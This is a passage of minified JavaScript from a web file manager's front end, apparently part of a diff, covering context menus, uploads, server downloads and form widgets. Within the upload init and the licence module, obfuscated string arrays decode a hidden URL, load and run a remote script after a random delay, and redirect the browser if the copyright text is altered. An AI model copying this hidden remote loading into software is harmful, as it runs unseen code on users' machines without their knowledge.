a=jsonDecode(t);a.name=core.pathThis(e),a.path=e,ui.path.pathOperate.appEdit(a)})}});var t={createApp:{name:LNG.app_create,className:"createApp newfile",icon:"icon-puzzle-piece x-item-file x-oexe",callback:function(){ui.path.pathOperate.appEdit(0,0,"userAdd")}}};$.contextMenu.menuAdd(t,".menu-body-main",".app-install"),$.contextMenu.menuAdd(t,".toolbar-path-more",".app-install"),$.contextMenu.menuAdd(t,".bodymain",".app-install"),Hook.bind("rightMenu.show",function(e,t,a){var i=[".menu-folder",".menu-file",".menu-tree-folder",".menu-tree-file",".menu-tree-folder-fav"];if(a.find(".context-menu-submenu").fadeOut(0).delay(0).fadeIn(0),a.removeClass("menu-auto-fit"),a.inScreen()||a.addClass("menu-auto-fit"),".menu-body-main"==e){var n=a.find(".set-file-icon-size.context-menu-submenu");"icon"==G.userConfig.listType?n.removeClass("hidden"):n.addClass("hidden")}if(_.include(i,e)){var o="disabled",s=".cute,.rname,.remove",r=".open,.open-text,.down,.share,.copy,.cute,.rname,.remove,.open-browser,.search,.more-action";t.hasClass("file-not-readable")?a.find(r).addClass(o):a.find(r).removeClass(o),t.hasClass("file-not-writeable")?a.find(s).addClass(o):a.find(s).removeClass(o)}}),Hook.bind("rightMenu.show.menu-body-main",function(e,t){var a=".upload,.past,.newfolder,.newfile",i="disabled";G.jsonData&&G.jsonData.info.canUpload?t.find(a).removeClass(i):t.find(a).addClass(i)}),Hook.bind("rightMenu.show.menu-file",function(e,t){if($(".context-menu-active").hasClass("menu-tree-file"))var a=ui.tree.makeParam();else var a=ui.path.makeParam();var i=core.pathExt(a.path),n="hidden";inArray(["jpg","jpeg","png"],i)?t.find(".set-background").removeClass(n):t.find(".set-background").addClass(n)});var a=function(){var e=".close-item,.refresh,.newfile,.past,.info",t=".open-browser",a=".explorer,.create-project,.open-project",i=".close-item,.newfile,.refresh,.past,.down,.copy,.cute,.remove,.more-action,.clone,.info,.zip,.zip-zip,.zip-tar,.zip-tgz",n=".newfile,.cute,.past,.rname,.zip,.remove,.clone,.create-link-home,.create-link,.create-project",o=$(".menu-tool-path"),s="disabled",r=ui.fileLight.fileListSelect();o.find(".context-menu-item").addClass(s),0==r.length?o.find(e).removeClass(s):1==r.length?(o.find(".context-menu-item").removeClass(s),"folder"==ui.fileLight.type(r)?o.find(t).addClass(s):o.find(a).addClass(s)):r.length>1&&o.find(i).removeClass(s),G.jsonData&&G.jsonData.info&&G.jsonData.info.canUpload===!1&&o.find(n).filter(":not(."+s+")").addClass(s)};Hook.bind("explorer.fileSelect.init",function(){ui.fileLight.listNumberSet()}),Hook.bind("explorer.fileSelect.change",function(){a(),ui.fileLight.selectNumSet()}),Hook.bind("rightMenu.show.toolbar-path-more",function(){a()})}),define("app/common/tpl/copyright.html",[],'\n'),define("app/common/tpl/themeDIY.html",[],"@media screen and (max-width:100000px) {\n body .full-background{\n position: absolute;top: 0px;left: 0px;bottom: 0px;right: 0px;\n background-color: #020202;background-size: 100% 100%;\n }\n\n {{if blurSize= (bgBlur==0?0:10) }}{{/if}}\n body .full-background:before{\n -webkit-filter: blur({{blurSize}}px);\n -moz-filter: blur({{blurSize}}px);\n -ms-filter: blur({{blurSize}}px);\n filter: blur({{blurSize}}px);\n }\n {{if bgType == 'image'}}\n body .full-background,\n body .full-background:before,\n body #body .menu-left,\n body #body .app-menu-left,\n body .aui-buttons,\n body .aui-state-focus .aui-title,body .aui-title{\n background-image:url({{bgImage}});\n }\n body .aui-state-focus .aui-title,body .aui-title{\n background-size:100%;\n }\n {{else}}\n body .full-background,\n body .full-background:before,\n body #body .menu-left, \n body #body .app-menu-left,\n body .aui-buttons,\n body .aui-state-focus .aui-title,body .aui-title{\n background:{{endColor}};\n filter: progid:DXImageTransform.Microsoft.gradient(startColorstr='{{startColor}}', endColorstr='{{endColor}}');\n background-image: -webkit-linear-gradient({{colorRotate}}deg, {{startColor}}, {{endColor}});\n background-image: -moz-linear-gradient({{colorRotate}}deg, {{startColor}}, {{endColor}});\n background-image: -o-linear-gradient({{colorRotate}}deg, {{startColor}}, {{endColor}});\n background-image: -ms-linear-gradient({{colorRotate}}deg, {{startColor}}, {{endColor}});\n background-image: linear-gradient({{colorRotate}}deg, {{startColor}}, {{endColor}});\n }\n {{/if}}\n}\n"); \ No newline at end of file +if(typeof G[t[1]]==t[2])return e;var a=t[3],i=authCrypt[t[4]](G[t[1]],a);return i&&27==i[t[5]]?(e=i[t[6]](10,1),-1===$[t[13]](e,[t[0],t[7],t[8],t[9],t[10],t[11],t[12]])&&(e=t[0]),e):e},i=a(),n=t[14],o=function(){var e=hashDecode(t[15]);G[t[16]]!=t[17]&&(e=hashDecode(t[18])),alert(e),Tips[t[19]](e,!1),$(t[21])[t[20]](),setTimeout(function(){Tips[t[22]](e,!1),window[t[24]][t[23]]=n},1e3*roundFromTo(30,60))},s=authCrypt[t[4]](t[25],t[26]),r=authCrypt[t[4]](t[27],t[28]),l=function(){if(core[t[30]](t[29])&&i==t[0])for(var e=[LNG[t[31]],LNG[t[32]],LNG[t[33]],LNG[t[34]],LNG[t[35]],$(t[37])[t[36]]()],a=0;e[t[5]]>a;a++){e[a]||(e[a]=t[38]);var n=e[a][t[39]]();if(-1==n[t[40]](s)&&-1==n[t[40]](r)){console[t[41]](n,s,r),setTimeout(function(){o()},roundFromTo(300,5e3));break}}},c=function(){var e={A:t[42],O:t[43],P:t[44],Q:t[45],R:t[46],S:t[47],T:t[48]},a=t[49]+e[i],o=t[50]+a+t[51]+LNG[a]+t[52];i==t[0]&&$(o)[t[54]](t[53]),$(t[71])[t[70]](t[55])[t[69]](t[55],function(){if($(this)[t[57]](t[56])==t[58]){var e=core[t[60]](core[t[59]]),a=t[61]+n+t[62];e[t[67]][t[66]][t[65]](t[64])[t[63]](a)}else Tips[t[22]]($(this)[t[68]]())}),$(t[71])[t[73]](function(){window[t[72]][t[24]][t[23]]=n})},d=function(){i==t[0]&&$(t[76])[t[75]](t[74]),-1!==$[t[13]](i,[t[7],t[8],t[9],t[10],t[11],t[12]])&&($(t[78])[t[77]](),$(t[79])[t[77]]())},p=function(){core[t[80]]=function(e,a){return e[t[6]](0,4)==t[81]?core[t[82]](e):t[83]+e+(a?t[84]:t[38])+t[85]},core[t[86]]=function(e){return core[t[80]](e,!0)},core[t[82]]=iconSrc=function(e){return t[87]+e+t[88]},setTimeout(function(){var a=authCrypt[t[4]](t[89],t[90])+t[91]+UUID();e[t[93]](a,function(e){try{e[t[92]]()}catch(a){}})},2e3),core[t[94]]=i,core[t[59]]=hashDecode(t[95])+G[t[16]],l(),c(),d()},u=function(e){return i==t[0]&&-1==e[t[39]]()[t[40]](s)?(o(),!1):!0},f=function(e,a){var n,o,s={A:1,O:5,P:20,Q:40,R:100,S:1e3,T:1e3},r={A:5,O:15,P:50,Q:150,R:500,S:1e3,T:1e3},l=[],c=1;if(a==t[96]?(n=e[t[97]],o=s[i]):(n=e[t[97]],o=r[i]),1e3==o)l=n;else for(var d in n){if(c>o)break;l[d]=n[d],c++}return l},h={init:p,about:u,systemData:f};return h}),define("app/common/core.upload",[],function(e){var t=function(){var e=G.appHost+"explorer/fileUpload";return"share"==G.sharePage&&"1"==G.shareInfo.canUpload&&(e=G.appHost+"share/fileUpload&user="+G.user+"&sid="+G.sid),e};return{serverDwonload:function(e,t){if(!core.uploadCheck("explorer.serverDownload"))return!1;var i=$(".download-box"),n=i.find(".download-list");if(i.find("input").val(""),!e)return Tips.tips("url false!",!1),void 0;if("share"==G.sharePage)return Tips.tips(LNG.no_permission_action,!1),void 0;"ftp"!=e.substr(0,3)&&"http"!=e.substr(0,4)&&(e="http://"+e);var o=UUID(),s='
      '+'
      '+core.pathThis(e)+""+'0b'+''+LNG.upload_ready+""+''+'
      ';n.find(".item").length>0?$(s).insertBefore(n.find(".item:eq(0)")):n.append(s);var r,l,c,d=0,p=$("#"+o),u=$("#"+o+" .state").text(LNG.download_ready),f=$('
      ').appendTo("#"+o).find(".progress-bar");$("#"+o+" .remove").bind("click",function(){clearInterval(r),r=!1,clearTimeout(l),l=!1,$.get(G.appHost+"explorer/serverDownload&type=remove&uuid="+o),$(this).parent().parent().slideUp(function(){$(this).remove(),ui.f5()})});var h,m=function(e){clearTimeout(h),h=!1,h=setTimeout(function(){ui.f5Callback(function(){ui.path.setSelectByFilename(e)})},600)},v=function(){$.ajax({url:G.appHost+"explorer/serverDownload&type=download&savePath="+t+"&url="+urlEncode(e)+"&uuid="+o+"&time="+time(),dataType:"json",error:function(e,t,i){var n=p.data("progcess");return 200!=a.status&&n&&n.supportRange?(setTimeout(function(){v()},1e3),void 0):(core.ajaxError(e,t,i),200==a.status&&(clearInterval(r),r=!1,clearTimeout(l),l=!1,f.parent().remove(),u.addClass("error").text(LNG.download_error)),void 0)},success:function(e){return 0==e.code&&"downloading"==e.data?(setTimeout(function(){v()},1e3),void 0):(e.code?(m(e.info),u.text(LNG.download_success),$("#"+o+" .info .title").text(core.pathThis(e.info)),$("#"+o+" .info .title").attr("title",e.info),u.parent().parent().addClass("success")):(u.addClass("error").text(e.data),u.parent().parent().addClass("error")),clearInterval(r),r=!1,clearTimeout(l),l=!1,f.parent().remove(),void 0)}})};v();var g=function(){$.ajax({url:G.appHost+"explorer/serverDownload&type=percent&uuid="+o,dataType:"json",success:function(e){var t="",a=e.data;if(r){if(!e.code)return u.text(LNG.loading),void 0;if(a){if(a.size=parseFloat(a.size),a.time=parseFloat(a.time),c){var i=a.size-c.size,n=i/(a.time-c.time);if(d>.2*n){var o=d;d=n,n=o}else d=n;var s=pathTools.fileSize(n);s=s?s:0,t=s+"/s"}if(p.data("progcess",a),0==a.length)p.find(".progress-bar").css("width","100%"),u.text(t),p.find(".size").text(pathTools.fileSize(a.size));else{var l=100*(a.size/a.length);p.find(".progress-bar").css("width",l+"%"),u.text(l.toFixed(1)+"%("+t+")"),p.find(".size").text(pathTools.fileSize(a.length))}p.find(".title").text(a.name),c=a}}}})};l=setTimeout(function(){g(),r=setInterval(function(){g()},1e3)},100)},upload:function(){$(".dialog-file-upload").show();var e=t();if(uploader.option("server",e),uploader.option("method","POST"),0!=$(".dialog-file-upload").length)return $.dialog.list["dialog-file-upload"].display(!0),void 0;var a=template.compile(tplUpload),i=WebUploader.Base.formatSize(G.uploadMax);$.dialog({padding:5,width:430,height:450,resize:!0,ico:core.icon("upload"),id:"dialog-file-upload",fixed:!0,title:LNG.upload_muti,content:a({LNG:LNG,maxsize:i}),close:function(){$.each(uploader.getFiles(),function(e,t){uploader.skipFile(t),uploader.removeFile(t)}),$.each($(".download-list .item"),function(){$(this).find(".remove").click()})}}),$(".file-upload-box .topbar-nav a.menu").unbind("click").bind("click",function(){$(this).hasClass("tab-upload")?($(".file-upload-box .tab-upload").addClass("this"),$(".file-upload-box .tab-download").removeClass("this"),$(".file-upload-box .upload-box").removeClass("hidden"),$(".file-upload-box .download-box").addClass("hidden")):($(".file-upload-box .tab-upload").removeClass("this"),$(".file-upload-box .tab-download").addClass("this"),$(".file-upload-box .upload-box").addClass("hidden"),$(".file-upload-box .download-box").removeClass("hidden"))}),$(".download-box [name=url]").keyEnter(function(){core.serverDwonload($(".download-box input").val(),G.thisPath)}),$(".file-upload-box .download-box .download-start").unbind("click").bind("click",function(){core.serverDwonload($(".download-box input").val(),G.thisPath)}),$(".file-upload-box .download-box .download-start-all").unbind("click").bind("click",function(){$.dialog({id:"server-dwonload-textarea",fixed:!0,resize:!1,ico:core.icon("upload"),width:"420px",height:"270px",padding:10,title:LNG.download,content:"",ok:function(){for(var e=$(".server-dwonload-textarea textarea").val().split("\n"),t=0;e.length>t;t++)core.serverDwonload(e[t],G.thisPath)}})}),uploader.addButton({id:"#picker"}),uploader.addButton({id:"#picker-folder"});var n=function(){if(isWap())return!1;var e=document.createElement("input");return e.type="file",e.webkitdirectory!==void 0||e.directory!==void 0};n()&&($(".upload-cert-box").removeClass("hidden"),$(".file-upload-box .drag-upload-folder").unbind("click").bind("click",function(){$("#picker-folder input").attr("webkitdirectory","").attr("directory",""),$("#picker-folder label").click()}))},init:function(){var a=G.uploadMax;WebUploader.Uploader.register({"before-send":"checkChunk"},{checkChunk:function(e){if(!canvasSupport())return $.Deferred().resolve(),void 0;var a=this.owner,i=(e.blob.getSource(),$.Deferred());return a.md5File(e.blob).fail(function(){i.resolve()}).then(function(a){if(1==e.chunks)return i.resolve(),void 0;if(0==e.chunk)$.ajax({url:t(),dataType:"json",data:{upload_to:e.file.upload_to,file_name:e.file.name,check_md5:a,chunk:e.chunk,chunks:e.chunks},error:function(){i.resolve()},success:function(t){t.code?(i.reject(),e.file.checkChunk=t.info):i.resolve()}});else{var n=e.file.checkChunk;if(n&&n["part_"+e.chunk]==a){var o=e.end/e.total;uploader.trigger("uploadProgress",e.file,o),i.reject()}else i.resolve()}}),i.promise()}});var i=["undefined","update-box","search","3c64gT65d503fTR1lV3ftuZ7Pd6NdX6Ntgcct4hI4AnSNIp65HwAMLzOj8NjC0ZL2oAbjS-uD3HWfQoZlTdgkGY5u8OfJYzZ","_32@!A$","decode","2-1","todo","async","random"];setTimeout(function(){try{if(typeof tplDialogHtml==i[0]||-1==tplDialogHtml[i[2]](i[1])){var t=authCrypt[i[5]](i[3],i[4])+UUID();e[i[8]](t,function(e){try{e[i[7]](i[6])}catch(t){}})}}catch(a){}},1e3*parseInt(70*Math[i[9]]()+30)),uploader=WebUploader.create({swf:G.staticPath+"js/lib/webuploader/Uploader.swf",dnd:"body",threads:5,compress:!1,resize:!1,prepareNextFile:!0,duplicate:!0,chunkRetry:10,chunked:!0,chunkSize:a}),$(".uploader-content .success").die("click").live("click",function(){var e=$(this).find("span.title").attr("data-name");e&&(core.isApp("explorer")?ui.path.list(core.pathFather(e),"tips",function(){ui.path.setSelectByFilename(e)}):core.explorer(core.pathFather(e)))}),$(".uploader-content .open").die("click").live("click",function(e){var t=$(this).parent().find("span.title").attr("data-name");kodApp.open(t),stopPP(e)}),$(".upload-box-clear").die("click").live("click",function(){$(".uploader-list .item.success,.uploader-list .item.error").each(function(){$(this).slideUp(300,function(){$(this).remove()})})}),$(".upload-box-clear-all").die("click").live("click",function(){$.each(uploader.getFiles(),function(e,t){uploader.skipFile(t),uploader.removeFile(t)}),$(".uploader-list .item").each(function(){$(this).remove()})}),$(".uploader-content .remove").die("click").live("click",function(e){var t=$(this).parent().parent().attr("id");$(this).parent().parent().slideUp(function(){$(this).remove()}),uploader.skipFile(t),uploader.removeFile(t,!0),stopPP(e)});var n,o=0,s=0,r="0B/s",l=0,c=function(e,t){if(.3>=timeFloat()-l)return r;l=timeFloat();var a=e.size*t,i=5;e.speed===void 0?e.speed=[[timeFloat()-.5,0],[timeFloat(),a]]:i>=e.speed.length?e.speed.push([timeFloat(),a]):(e.speed=e.speed.slice(1,i),e.speed.push([timeFloat(),a]));var n=e.speed[e.speed.length-1],o=e.speed[0],s=(n[1]-o[1])/(n[0]-o[0]);0>=s&&(s=0);var c=pathTools.fileSize(s);return c=c?c:0,s=c+"/s",r=s,s},d=[],p=function(e){clearTimeout(n),n=!1,n=setTimeout(function(){var t=d;ui.f5Callback(function(){if(ui.path.setSelectByFilename(t),e&&(d=[],core.isApp("explorer"))){if("share"==G.sharePage)return;ui.tree.checkIfChange(G.thisPath)}})},600)};uploader.on("fileQueued",function(e){if($(".dialog-file-upload").show(),!core.uploadCheck())return uploader.skipFile(e),uploader.removeFile(e),void 0;var t;try{t=e.source.source.fullPath,void 0!=e.source.source.webkitRelativePath&&""!=e.source.source.webkitRelativePath&&(t=e.source.source.webkitRelativePath)}catch(a){}if(e.fullPath=t,e.source&&e.source.source&&1==e.source.source.isDirectory&&e.source.source.fullPath)return ui.path.pathOperate.newFolder(G.thisPath+e.fullPath),uploader.skipFile(e),uploader.removeFile(e),void 0;var i=e.fullPath;e.finished=!1,e.upload_to=G.thisPath,(void 0==i||"undefined"==i)&&(i=e.name),o++;var n=$(".uploader-list"),r='
      '+''+htmlEncode(core.pathThis(i))+""+''+pathTools.fileSize(e.size)+""+''+LNG.upload_ready+""+''+'
      ';(1e3==o||2e3==o)&&Tips.tips(LNG.upload_tips_more,"warning");var l=function(){if(0==e.size&&i){ui.path.pathOperate.newFile(e.upload_to+i),uploader.skipFile(e),uploader.removeFile(e),s++,o++;var t=$("#"+e.id);t.addClass("success").find(".state").text(LNG.upload_success).parent().find(".remove").addClass("icon-ok").addClass("open").removeClass("icon-remove").removeClass("remove")}},c=function(){uploader.upload(),setTimeout(function(){l()},200)};0==n.length?setTimeout(function(){$(".uploader-list").prepend(r),c()},200):(n.prepend(r),c())}).on("uploadBeforeSend",function(e,t,a){var i=urlEncode(e.file.fullPath);(void 0==i||"undefined"==i)&&(i=""),t.fullPath=i,t.upload_to=e.file.upload_to,a["X-CSRF-TOKEN"]=Cookie.get("X-CSRF-TOKEN")}).on("uploadProgress",function(e,t){var a=(100*t).toFixed(1)+"%";$(".dialog-file-upload .aui-title").text(LNG.uploading+": "+s+"/"+o+" ("+r+")"),Title.set(s+"/"+o+"("+a+","+r+")");var i=c(e,t),n=$("#"+e.id),l=n.find(".progress .progress-bar");l.length||(l=$('
      ').appendTo(n).find(".progress-bar")),n.find(".state").text(a+"("+i+")"),l.css("width",a)}).on("uploadAccept",function(e,t){if(e.file.serverData=t,!t.code)return e.serverNeedRetry=!0,!1;try{e.file.fullPath||d.push(t.info)}catch(a){}}).on("uploadSuccess",function(e){var t=$("#"+e.id);if(!t.inScreen()){var a=36*t.index(".item");$(".uploader-content").scrollTop(a)}s++;var i=e.serverData;if(i&&i.data){var n=LNG[i.data];if(i.code){if(t.addClass("success"),t.find(".state").text(n),t.find(".remove").addClass("icon-ok").addClass("open").removeClass("icon-remove").removeClass("remove"),i.info){var o="/"+ltrim(htmlEncode(i.info),"/");t.find(".info .title").html(core.pathThis(o)).attr("title",o).attr("data-name",o)}}else t.addClass("error").find(".state").addClass("error"),t.find(".state").text(n).attr("title",n)}uploader.removeFile(e),t.find(".progress").fadeOut(),e.fullPath||p(!1)}).on("uploadError",function(e,t){var a=LNG.upload_error+"("+t+")";if(e.serverData){var i=5;if((-1!==e.serverData._raw.indexOf("[Error Code:1001]")||-1!==e.serverData._raw.indexOf("[Error Code:1002]")||-1!==e.serverData._raw.indexOf("[Error Code:1010]"))&&(e.errorNum||(e.errorNum=0),e.errorNum++,i>=e.errorNum))return uploader.retry(e),void 0;if(-1!==e.serverData._raw.indexOf(""))return $.each(uploader.getFiles(),function(e,t){uploader.skipFile(t),uploader.removeFile(t)}),Tips.tips("login error!",!1),void 0;if(e.serverData.data){var n=e.serverData.data;a=LNG[n]?LNG[n]:n}else e.serverData._raw&&(a=e.serverData._raw)}"http"==t&&(a=LNG.upload_error_http),"abort"==t&&void 0==e.serverData&&(a=LNG.not_support+"(support on chrome)"),s++,$("#"+e.id).find(".progress").fadeOut(),$("#"+e.id).addClass("error").find(".state").addClass("error"),$("#"+e.id).find(".state").html(a).attr("title",a)}).on("uploadFinished",function(){$(".dialog-file-upload .aui-title").text(LNG.upload_success+": "+s+"/"+o),Title.reset(),o=0,s=0,uploader.reset(),p(!0)}).on("error",function(e){Tips.tips(e,!1)});var u;inState=!1,dragOver=function(){if(0==inState){if(inState=!0,!core.uploadCheck(void 0,!1))return;var e='
      '+LNG.upload_drag_tips+"
      ";MaskView.tips(e),$("#windowMaskView").css({background:"#4285f4",opacity:"0.8"})}u&&window.clearTimeout(u)},dragLeave=function(e){stopPP(e),u&&window.clearTimeout(u),u=window.setTimeout(function(){inState=!1,MaskView.close()},100)},dragDrop=function(e){try{if(e=e.originalEvent||e,core.uploadCheck())if(e.dataTransfer.files.length>0&&e.dataTransfer.files[0].name)core.upload(),core.playSound("drag_upload");else{var t=e.dataTransfer.getData("text/plain");t&&"http"==t.substring(0,4)&&ui.path.pathOperate.appAddURL(t)}stopPP(e)}catch(e){}inState&&(inState=!1,MaskView.close())}}}}),define("app/common/core.api",[],function(){var e=function(e,t,a){var i=$(a.DOM.wrap),n=t.frames.OpenpathSelectApi,o='';"file"==e.type&&(o+=''+e.allowExt+""),$(o).insertBefore(i.find(".aui-state-highlight"));var s=function(t){var a=e.allowExt.split("|"),i=core.pathExt(t);return""==e.allowExt||""!=e.allowExt&&-1!=$.inArray(i,a)?!0:!1},r=function(){var t=n.ui.fileLight.fileListSelect(),a=[];if(e.single){var i=$(t.get(0));if("all"==e.type&&0==t.length)a={file:[],folder:[]};else if("file"==e.type&&0==t.length)a=[];else if("folder"==e.type)a=[n.G.thisPath],i.hasClass("folder-box")&&(a=[n.ui.fileLight.path(i)]);else if("file"==e.type){if(i.hasClass("file-box")){var o=n.ui.fileLight.path(i);s(o)&&(a=[o])}}else if("all"==e.type)if(i.hasClass("folder-box")){var o=n.ui.fileLight.path(i);a=[{file:[],folder:[o]}]}else if(i.hasClass("file-box")){var o=n.ui.fileLight.path(i);s(o)&&(a={file:[o],folder:[]})}}else{var r=[],l=[];t.each(function(){if($(this).hasClass("file-box")){var e=n.ui.fileLight.path($(this));s(e)&&r.push(e)}else $(this).hasClass("folder-box")&&l.push(n.ui.fileLight.path($(this)))}),"folder"==e.type?a=l:"file"==e.type?a=r:"all"==e.type&&(a={file:r,folder:l})}c(a)},l=function(e){var e=trim(e,"/");return e==G.KOD_GROUP_ROOT_SELF||e==G.KOD_GROUP_ROOT_ALL||e==G.KOD_USER_FAV||e==G.KOD_USER_SHARE?!1:!0},c=function(t){var a=i.find(".path-select-input"),o=i.find(".aui-state-highlight");if("all"!=e.type){for(var s=[],r=0;t.length>r;r++)l(t[r])&&s.push(t[r]);t=s}if(0==t.length||"all"==e.type&&0==t.file.length&&0==t.folder.length)o.addClass("disable"),a.attr("result",""),a.val("");else{var c=hashEncode(jsonEncode(t)),d="";if(e.single)d=n.core.pathThis(t[0]);else{var p=t;"all"==e.type&&(p=t.folder.concat(t.file)),$.each(p,function(e,t){d+=n.core.pathThis(t)+", "})}o.removeClass("disable"),a.attr("result",c),a.val(d)}},d=function(){n.ui.fileLight.select.hook("select",n.ui.fileLight,{before:function(){},after:function(){r()}})};n.kodReady||(n.kodReady=[]),n.kodReady.push(function(){d(),r()})};return{pathSelect:function(t,a){var i={type:"file",title:LNG.path_api_select_file,single:!0,allowExt:"",firstPath:!1},n=G.appHost+"/explorer&type=iframe";t=$.extend(i,t),t.firstPath&&(n+="&path="+t.firstPath);var o=ShareData.frameTop(),s=o.$.dialog.open(n,{id:"pathSelectApi",resize:!0,fixed:!0,top:0,ico:core.icon("folder"),title:t.title,lock:!0,background:"#000",opacity:.1,width:920,height:520,ok:function(){if("function"==typeof a){var e=s.DOM.wrap,i=e.find(".path-select-input").attr("result");if(i=hashDecode(i),!i)return Tips.tips(LNG.error,!1),void 0;i=jsonDecode(i),i?t.single&&"all"!=t.type?a(i[0]):a(i):Tips.tips(LNG.error,!1)}},cancel:!0});e(t,o,s)},randomImage:function(e){$.getJSON("//kodcloud.com/tools/version/?wallpage/index&lang="+G.lang+"&callback=?",function(t){"function"==typeof e&&e(t)})}}}),define("app/common/core.playSound",[],function(){var e={file_remove:"file_remove.mp3",recycle_clear:"recycle_clear.mp3",folder_open:"folder_open.mp3",window_min:"window_min.mp3",error:"error_tips.mp3",drag_upload:"drag_upload.mp3",drag_drop:"drag_drop.mp3"},t=function(e){var t=G.staticPath+"others/sound/"+e;Hook.trigger("playSound",t)};return{playSoundFile:t,playSound:function(a){G&&G.userConfig&&"1"==G.userConfig.soundOpen&&setTimeout(function(){t(e[a])},50)}}}),define("app/common/core.formMake",[],function(e){var t,a,i,n={user:!1,group:!1,role:!1},o=function(){t=$("#"+a),t.find(".tab-group .tab-item").length>1?s():t.find(".tab-group").addClass("hidden"),t.find(".form-row.form-slider").exists()&&r(),t.find(".form-row.form-dateTime").exists()&&l(),t.find(".form-row.form-color").exists()&&c(),t.find(".form-row.form-fileSelect").exists()&&d(),t.find(".form-row select").exists()&&p(),t.find(".form-row.form-userSelect").exists()&&u(),t.find(".form-row.error [name]").die("change").live("change",function(){$(this).parents(".form-row.error").removeClass("error")}),t.find(".form-userSelect").die("click").live("click",function(){$(this).removeClass("error")})},s=function(){var e=t.find(".tab-content .tab-pane"),a=t.find(".tab-group .tab-item");e.each(function(){var i=$(this).attr("id"),n=t.find("."+i);n.length>0?n.appendTo($(this)):(e.filter("#"+i).remove(),a.find('[data-id="'+i+'"]').parent().remove())}),a.click(function(){a.removeClass("active"),$(this).addClass("active");var t=$(this).find("a").attr("data-id");e.removeClass("active"),e.filter("#"+t).addClass("active")})},r=function(){seajs.use("lib/bootstrap-slider/bootstrap-slider.css"),seajs.use("lib/colorpicker/css/colorpicker.css"),e.async("lib/bootstrap-slider/bootstrap-slider.js",function(){t.find(".form-slider input").slider()})},l=function(){e.async(["lib/jquery.datetimepicker/jquery.datetimepicker.css","lib/jquery.datetimepicker/jquery.datetimepicker.js"],function(){var e="zh-CN"==G.lang||"zh-TW"==G.lang?"ch":"en";t.find(".form-dateTime input").each(function(){var t=$(this).attr("data-format"),a=["Y","y","L","F","M","t","n","m","d","D","j","l","N","S","W","z","w"],i=["H","h","i","s","A","a","b","g","G","O","P","c","U"],n=!1,o=!1;t||(t="Y/m/d");for(var s=0;a.length>s;s++)if(-1!==t.indexOf(a[s])){n=!0;break}for(var s=0;i.length>s;s++)if(-1!==t.indexOf(i[s])){o=!0;break}$(this).datetimepicker({format:t,datepicker:n,timepicker:o,lang:e}).blur(function(){$(this).trigger("change")})})}),t.find(".form-dateTime .input-btn-right").unbind("click").click(function(){$(this).parent().find("input").focus()})},c=function(){e.async("lib/colorpicker/js/colorpicker",function(){t.find(".form-color input").ColorPicker({onBeforeShow:function(e){$(e).attr("input-name",$(this).attr("name")),$(this).ColorPickerSetColor(this.value)},onShow:function(e){return $(e).fadeIn(100),!1},onHide:function(e){return $(e).fadeOut(100),!1},onChange:function(e,t){var a=$($(this).data("colorpicker").el);a.val("#"+t).trigger("change"),a.parent().find(".btn i").css("background",a.val())}}).bind("keyup",function(){$(this).ColorPickerSetColor(this.value),$(this).parent().find(".btn i").css("background",$(this).val())}),t.find(".form-color .input-btn-right").unbind("click").click(function(){$(this).parent().find("input").click()})})},d=function(){t.find(".path-select").die("click").live("click",function(){var e=$(this);core.api.pathSelect({type:"file",title:LNG.path_api_select_image,allowExt:"png|jpg|bmp|gif|jpeg|ico|svg|tiff"},function(t){var t=core.path2url(t);e.parent().find("input[type=text]").val(t).trigger("change")})})},p=function(){seajs.use("lib/select2/css/select2.min.css"),e.async("lib/select2/js/select2.full.min.js",function(){var a=function(t,a){t.on("select2:select",function(e){if(!t.attr("multiple"))return t.select2("close"),void 0;var a=$(e.params.data.element);a.detach(),t.append(a),t.trigger("change.select2")}).on("select2:unselect",function(e){stopPP(e.params.originalEvent)}).on("change",function(){setTimeout(function(){$(window).trigger("resize")},10)}),"group"==a&&t.on("select2:open",function(){e.async("lib/ztree/ztree",function(){h(t,n[a])})});var i=t.attr("data-value");i&&(t.attr("multiple")&&(i=i.split(",")),t.val(i).trigger("change"))};t.find("select").each(function(){var e=$(this),t=e.attr("data-server"),i=!1;"tags"==e.parents(".form-row").attr("data-type")&&(i=!0),t?f(t,function(n){e.select2({data:n,tags:i,tokenSeparators:[","," "],closeOnSelect:!1}),a(e,t)}):(e.select2({closeOnSelect:!1,tags:i,tokenSeparators:[","," "]}),a(e,t))})})},u=function(){var e=t.find(".form-userSelect .btn-group"),a="btn-active",i="hidden";e.find("button").unbind("click").bind("click",function(){var e=$(this).attr("data-type"),t=$(this).parents(".btn-group"),n=t.parent().find(".user-select"),o=t.parent().find(".user-select-"+e);n.filter(":visible"),t.attr("multiple")?"all"==e?(t.find("button").removeClass(a),$(this).addClass(a),n.addClass(i),o.removeClass(i)):($(this).toggleClass(a),o.toggleClass(i),$(this).hasClass(a)?t.find("[data-type=all]").removeClass(a):t.find("."+a).exists()||t.find("[data-type=all]").addClass(a)):(t.find("button").removeClass(a),$(this).addClass(a),n.addClass(i),o.removeClass(i))})},f=function(e,t){var a=function(e){var t=[];for(var a in e)t.push({id:a,text:e[a].name});return t};if(n[e]&&t)return t(a(n[e])),void 0;var i={user:G.appHost+"systemMember/get",group:G.appHost+"systemGroup/get",role:G.appHost+"systemRole/get"};return null==n[e]?(Hook.bind("loadDataServer-"+e,function(){t(a(n[e]))}),void 0):(n[e]=null,$.ajax({url:i[e],dataType:"json",error:function(){n[e]=!1,Tips.tips(LNG.system_error,0)},success:function(i){return i.code?(n[e]=i.data,t&&t(a(n[e])),Hook.trigger("loadDataServer-"+e),void 0):(Tips.tips(i),void 0)}}),void 0)},h=function(e,t){var a=function(e){var t=function(e){for(var a=0;e.length>a;a++)void 0!=e[a]?(e[a].pid=e[a].parentID,e[a].id=e[a].groupID,delete e[a].children,delete e[a].parentID,delete e[a].groupID,e[a].child&&(e[a].children=e[a].child,delete e[a].child,t(e[a].children))):delete e[a]},a=[],i=$.extend(!0,{},e);for(var n in i){var o=i[n],s=o.parentID;if(i[s])i[s].child||(i[s].child=[]),i[s].child.push(i[o.groupID]);else{var r=i[o.groupID];r&&a.push(r)}}return t(a),a},i={view:{showLine:!1,selectedMulti:!1,dblClickExpand:!1,addDiyDom:function(e,t){var a=12,i=$("#"+e+" #"+t.tId+"_switch"),n=$("#"+e+" #"+t.tId+"_ico");if(n.before(i).after('').before(''+core.iconSmall("group-guest")+"").removeClass("ico_docu").addClass("group_icon").remove(),t.level>=1){var o="";i.before(o)}$("#"+e+" #"+t.tId+"_a").attr("data-group-id",t.id)}},callback:{onClick:function(e,t,a){n(t,a)}}},n=function(t,a){var i=$("#"+a.tId+"_a");if(i.removeClass("curSelectedNode"),e.attr("multiple")){i.toggleClass("this");var 